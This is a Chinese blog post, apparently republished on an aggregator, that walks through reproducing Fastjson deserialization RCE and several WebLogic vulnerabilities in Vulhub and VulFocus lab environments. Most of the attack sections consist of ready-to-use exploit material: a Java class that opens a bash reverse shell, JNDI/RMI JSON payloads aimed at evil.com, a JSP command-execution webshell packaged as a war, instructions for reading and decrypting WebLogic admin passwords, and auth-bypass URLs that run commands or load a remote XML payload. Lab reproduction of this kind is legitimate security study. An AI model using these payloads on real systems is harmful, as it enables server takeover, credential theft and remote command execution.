Java安全-Java Vuls(FastjsonWeblogic漏洞复现)

Posted OceanSec

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Java安全-Java Vuls(FastjsonWeblogic漏洞复现)相关的知识,希望对你有一定的参考价值。


复现几个 Java 的漏洞,文章会分多篇这是第一篇,文章会分组件和中间件两个角度进行漏洞复现

复现使用环境

  1. Vulhub
  2. VulFocus

文章目录

组件

Fastjson 1.2.24 反序列化 RCE

FastJson 库是 Java 的一个 Json 库,其作用是将 Java 对象转换成 json 数据来表示,也可以将 json 数据转换成 Java 对象

在 1.2.24 版本的 Fastjson 出现了一个反序列化的漏洞,fastjson 在解析 json 的过程中,支持使用 autoType 来实例化某一个具体的类,并调用该类的 set/get 方法来访问属性

因为目标环境是 Java 8u102,没有 com.sun.jndi.rmi.object.trustURLCodebase 的限制,我们可以使用 com.sun.rowset.JdbcRowSetImpl 的利用链,借助 JNDI 注入来执行命令,漏洞利用过程与 Log4j、jackson jdni 注入一致

1.创建恶意类并生成 class 字节码文件

import java.lang.Runtime;
import java.lang.Process;

public class Test 
   static 
       try 
          Runtime r = Runtime.getRuntime();
          Process p = r.exec(new String[]"/bin/bash","-c","bash -i >& /dev/tcp/IP/PORT 0>&1");
          p.waitFor();
        catch (Exception e) 
           // do nothing
       
   

注意代码中 IP 为 VPS IP 端口为 NC 监听端口,在命令行中使用命令生成字节码文件

2.将字节码文件上传至 VPS,使用 python 开一个 web 服务,确保可以下载 class 文件

python3 -m http.server 8888

3.借助 marshalsec 项目,启动一个 RMI 服务器,监听9999 端口,并制定加载远程类 Test.class

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999

4.向靶场服务器发送 Payload,带上 RMI 的地址:

POST / HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160


    "b":
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/TouchFile",
        "autoCommit":true
    

特别注意:在 Java 漏洞复现中需要特别注意 HTTP 请求头真的会影响,所以复现中使用上面代码块中的 payload

如果直接是 burp 抓包,改请求方式,不会利用成功,如下图,因为 Content-Type 不对

执行步骤如图所示

正是因为在 vps 上需要开三个服务所以显得很乱

Fastjson 1.2.47 反序列化 RCE

Fastjson 于 1.2.24 版本后增加了反序列化白名单,而在 1.2.48 以前的版本中,攻击者可以利用特殊构造的 json 字符串绕过白名单检测,成功执行任意命令

环境用 vulhub

执行如下命令启动一个spring web项目,其中使用 fastjson 作为默认 json 解析器:

docker-compose up -d

环境启动后,访问http://your-ip:8090即可看到一个json对象被返回,我们将content-type修改为application/json后可向其POST新的JSON对象,后端会利用fastjson进行解析

vulhub 提供的目标环境是openjdk:8u102,这个版本没有com.sun.jndi.rmi.object.trustURLCodebase的限制,可以使用 rmi 进行命令执行

复现方法一致,payload 利用其缓存机制可实现对未开启 autotype 功能的绕过


    "a":
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    ,
    "b":
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/Exploit",
        "autoCommit":true
    

中间件

weblogic 漏洞不止这几个

Weblogic 文件读取&war包上传(Vulhub)

环境所在 vulhub 目录,weblogic 挺大的可以用 vulfocus 的环境

/vulhub-master/weblogic/weak_password

开启环境后,访问http://your-ip:7001/console,即为weblogic后台

记录以下这个样子

环境存在弱口令:

  • weblogic
  • Oracle@123

weblogic常用弱口令: http://cirt.net/passwords?criteria=weblogic

如果存在弱口令就可以直接进入后台上传 war 部署后门就行了,这也是 Java 中间件普遍利用方法

这套环境模拟了一个任意文件下载漏洞,对并不是说 weblogic 的任意文件读取

http://your-ip:7001/hello/file.jsp?path=/etc/passwd

尝试读取敏感文件

weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,名为SerializedSystemIni.datconfig.xml,在本环境中为./security/SerializedSystemIni.dat./config/config.xml(基于当前目录/root/Oracle/Middleware/user_projects/domains/base_domain

尝试读取 SerializedSystemIni.dat 这是一个二进制文件,所以一定要用 burpsuite 来读取,用浏览器直接下载可能引入一些干扰字符。在 burp 里选中读取到的那一串乱码,右键 copy to file 就可以保存成一个文件

config/config.xml是 base_domain 的全局配置文件,所以乱七八糟的内容比较多,找到其中的<node-manager-password-encrypted>的值,即为加密后的管理员密码

对于这个密码在 vulhub 的环境中也提供了解密工具,GitHub 上也有整理好的工具,链接

weblogic_decrypt.jar

这个工具要和 lib 在一个目录启动

密码一致,解密成功,可以登录后台上传 webshell

1.首先生成后门 test.jsp

<%
    if("123".equals(request.getParameter("pwd")))
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1)
            out.println(new String(b));
        
        out.print("</pre>");
    
%>

构造 war 包

jar cvf test.war test.jsp

值得注意的是,我们平时 tomcat 用的 war 包不一定能够成功,你可以将你的 webshell 放到本项目的 web/hello.war 这个压缩包中

使用这种方法要注意应用目录在 war 包中 WEB-INF/weblogic.xml 里指定(因为本测试环境已经使用了/hello这个目录,所以你要在本测试环境下部署 shell,需要修改这个目录,比如修改成其他的)

进入后台,部署,点击安装

点击上载文件,选择文件

存放路径

/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/upload/test.war

一路 next 直到完成部署,访问后门

Weblogic 任意文件上传 CVE-2018-2894

WebLogic 管理端未授权的两个页面存在任意上传 getshell 漏洞,可直接获取权限。两个页面分别为 /ws_utc/begin.do,/ws_utc/config.do,Web Service Test Page,在 “生产模式” 下默认不开启,所以该漏洞有一定限制

环境启动后,访问http://your-ip:7001/console,即可看到后台登录页面。

执行docker-compose logs | grep password可查看管理员密码,管理员用户名为weblogic

登录后台页面,点击base_domain的配置,在“高级”中开启“启用 Web 服务测试页”选项,开启了的就存在此漏洞了

漏洞存在于 http://your-ip:7001/ws_utc/config.do

可以发现此界面访问无需登录,设置 Work Home Dir为/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

将目录设置为ws_utc应用的静态文件css目录,访问这个目录是无需权限的,这一点很重要

然后点击安全 -> 增加,然后上传 webshell,并抓包

查看返回包

或者不抓包上传后 F12 审查元素

然后访问

 http://your-ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]

直接可以执行命令了,weblogic 真养活半个安全圈

Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)

CVE-2020-14882 允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883 允许后台任意用户通过 HTTP 协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个 GET 请求在远程 Weblogic 服务器上以未授权的任意用户身份执行命令

复现环境使用 vulfocus

1.首先测试权限绕过漏洞(CVE-2020-14882),访问以下URL,即可未授权访问到管理后台页面:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal

登录之后目前是权限最低的用户,无法安装应用也无法执行代码

2.利用到第二个漏洞CVE-2020-14883 通过 HTTP 协议执行任意命令。这个漏洞的利用方式有两种:

  1. 通过com.tangosol.coherence.mvel2.sh.ShellSession

    直接访问如下URL,即可利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令

    http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")
    

    这个利用方法只能在 Weblogic 12.2.1 以上版本利用,因为 10.3.6 并不存在com.tangosol.coherence.mvel2.sh.ShellSession

  2. 通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

    这是一种更为通杀的方法,最早在 CVE-2019-2725 被提出,对于所有 Weblogic 版本均有效。

    首先,我们需要构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,如http://example.com/rce.xml

    <?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg>
              <list>
                <value>bash</value>
                <value>-c</value>
                <value><![CDATA[touch /tmp/success2]]></value>
              </list>
            </constructor-arg>
        </bean>
    </beans>
    

    然后通过如下URL,即可让Weblogic加载这个XML,并执行其中的命令:

    http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")
    

    这个利用方法也有自己的缺点,就是需要Weblogic的服务器能够访问到恶意XML

参考:
https://vulhub.org
文章很大部分摘录于此

以上是关于Java安全-Java Vuls(FastjsonWeblogic漏洞复现)的主要内容,如果未能解决你的问题,请参考以下文章

[Java安全]fastjson学习

[Java安全]fastjson学习

[Java安全]fastjson学习

[Java安全]fastjson学习

Java安全之FastJson JdbcRowSetImpl 链分析

JAVA详细思路|Java安全之FastJson JdbcRowSetImpl 链分析